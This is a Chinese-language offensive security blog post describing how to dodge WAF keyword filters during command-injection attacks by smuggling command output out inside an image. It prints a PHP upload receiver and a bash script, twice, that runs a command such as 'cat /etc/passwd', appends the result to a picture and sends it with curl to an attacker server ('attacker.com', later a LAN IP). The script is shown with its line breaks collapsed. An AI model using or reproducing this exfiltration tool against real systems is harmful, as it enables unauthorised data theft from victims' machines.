各位师傅已放假,公众号更新速度自然也要跟得上。今天就是一个命令执行的小技巧。
我们在实战中经常会遇到命令执行漏洞,而由于现在各类waf横行,就会导致我们在执行一些命令时直接被waf拦截,比如执行cat /etc/passwd的时候,直接被拦截了关键字,导致我们无法成功执行。类似于下图这种。
然后直接被waf拦截住。这个时候如果目标出网的话,我们就可以使用下面的方法,进行突破。原理大体如下:
即让目标主动访问我们的一个php的服务,并且将执行结果写入图片,然后打开图片得到我们的命令执行结果
下面是具体操作:
首先我们需要准备一个php文件,内容如下:
<?php $file = date("dHis") . ".png"; move_uploaded_file($_FILES['image']['tmp_name'], $file);?>
然后我们还需要一个脚本文件,来完成请求与命令执行操作:
#!/bin/bash# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/# `if` statement to detemine if the message is a 'response' one# This is the command being executed and embedded in the photo.# Single-quotes are used here to help with escaping special# characters within the desired command(s).exfilData='ls -lah "/Users/$USER/"'# Where the attackers PHP server is located. This needs to be# updated to use a public domain, like Dropbox or something# with an official API.exfilSite="http://attacker.com/index.php"# If no suitable image is found on the target computer, this# image will be downloaded and used instead. By default, the# script tries to use an image already on the MacBook to# minimize the amount of traffic originating the device.tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"# The `find` command used to locate a suitable image to embed# data into. It will check the users home (~) directory for the# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.# The filesize maximum and filetypes are somewhat arbitrary.# The size can be increased and the filetypes can be expanded# to use MP3, PDF, and MOV files, for example.findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"# If the encryption option is enabled, the password is hardcoded# into the payload for convenience, making it possible to# reverse engineer and decrypt the exfiltrated data inside the# image. This is a quick and dirty solution.pass="password123"# An `if` statement to detect if a suitable PNG or JPG was# discovered. If not, it will download the backup image# defined earlier in the script (tmpImage).if [[ ! -f "$findImage" ]]; then # Curl will silently (-s) download the backup image and # save it (-o) into the /tmp directory with the i.jpg filename. curl -s "$tmpImage" -o "/tmp/i.jpg" # The backup image is set into the exfilImage variable for # later commands. exfilImage="/tmp/i.jpg"else # If a suitable image is discovered, the exfilImage variable # is set for later commands. exfilImage="$findImage"fi# It may or may not be desirable to encrypt the payload output# before embedding it into the image. Set to `1` to enable# encryption, set to `0` to disable it.useEncrypt='1'# An `if` statement to determine the value of the exfilType# variable. If `1` it will encrypt with openssl (LibreSSL).# Otherwise, it will not encrypt.if [[ "$useEncrypt" = '1' ]]; then # OpenSSL is used to encrypt (enc) the payload output # as well as encode (-a -A) the encrypted data with a # password (-pass). exfilData="$(openssl enc -aes-256-cbc -a -A -in -pass pass:$pass)"else # If encryption isn't used, Bash will evaluable the variable # and execute it as a command. exfilData="$(eval $exfilData)"fi# Printf is used to embed the command output directly into# image. It will append (>>) the data on a newline (\n\n).# The newlines make it easy to quickly extract the data# after it has been delivered to the attacker.printf '\n\n%s' "$exfilData" >> "$exfilImage"# Curl will exfiltrate the image to the attackers PHP# server.curl -F "image=@$exfilImage" "$exfilSite"
然后我们修改exfilData为我们需要执行的命令,exfilSite为你的php站点的地址,tmpImage是图片的一个地址,我这里直接使用百度的图片,useEncrypt决定是否进行硬编码,1为使用上面的密码进行编码,0为不编码。
修改后如下:
#!/bin/bash# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/# `if` statement to detemine if the message is a 'response' one# This is the command being executed and embedded in the photo.# Single-quotes are used here to help with escaping special# characters within the desired command(s).exfilData='cat /etc/passwd'# Where the attackers PHP server is located. This needs to be# updated to use a public domain, like Dropbox or something# with an official API.exfilSite="http://192.168.0.107/index.php"# If no suitable image is found on the target computer, this# image will be downloaded and used instead. By default, the# script tries to use an image already on the MacBook to# minimize the amount of traffic originating the device.tmpImage="https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png"# The `find` command used to locate a suitable image to embed# data into. It will check the users home (~) directory for the# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.# The filesize maximum and filetypes are somewhat arbitrary.# The size can be increased and the filetypes can be expanded# to use MP3, PDF, and MOV files, for example.findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"# If the encryption option is enabled, the password is hardcoded# into the payload for convenience, making it possible to# reverse engineer and decrypt the exfiltrated data inside the# image. This is a quick and dirty solution.pass="password123"# An `if` statement to detect if a suitable PNG or JPG was# discovered. If not, it will download the backup image# defined earlier in the script (tmpImage).if [[ ! -f "$findImage" ]]; then # Curl will silently (-s) download the backup image and # save it (-o) into the /tmp directory with the i.jpg filename. curl -s "$tmpImage" -o "/tmp/i.jpg" # The backup image is set into the exfilImage variable for # later commands. exfilImage="/tmp/i.jpg"else # If a suitable image is discovered, the exfilImage variable # is set for later commands. exfilImage="$findImage"fi# It may or may not be desirable to encrypt the payload output# before embedding it into the image. Set to `1` to enable# encryption, set to `0` to disable it.useEncrypt='0'# An `if` statement to determine the value of the exfilType# variable. If `1` it will encrypt with openssl (LibreSSL).# Otherwise, it will not encrypt.if [[ "$useEncrypt" = '1' ]]; then # OpenSSL is used to encrypt (enc) the payload output # as well as encode (-a -A) the encrypted data with a # password (-pass). exfilData="$(openssl enc -aes-256-cbc -a -A -in -pass pass:$pass)"else # If encryption isn't used, Bash will evaluable the variable # and execute it as a command. exfilData="$(eval $exfilData)"fi# Printf is used to embed the command output directly into# image. It will append (>>) the data on a newline (\n\n).# The newlines make it easy to quickly extract the data# after it has been delivered to the attacker.printf '\n\n%s' "$exfilData" >> "$exfilImage"# Curl will exfiltrate the image to the attackers PHP# server.curl -F "image=@$exfilImage" "$exfilSite"
然后开启一个web服务:
然后模拟攻击者执行脚本文件,服务器得到请求
服务器生成图片,打开图片得到命令执行的内容:
参考文章:
https://null-byte.wonderhowto.com/how-to/hacking-macos-use-images-smuggle-data-through-firewalls-0197128/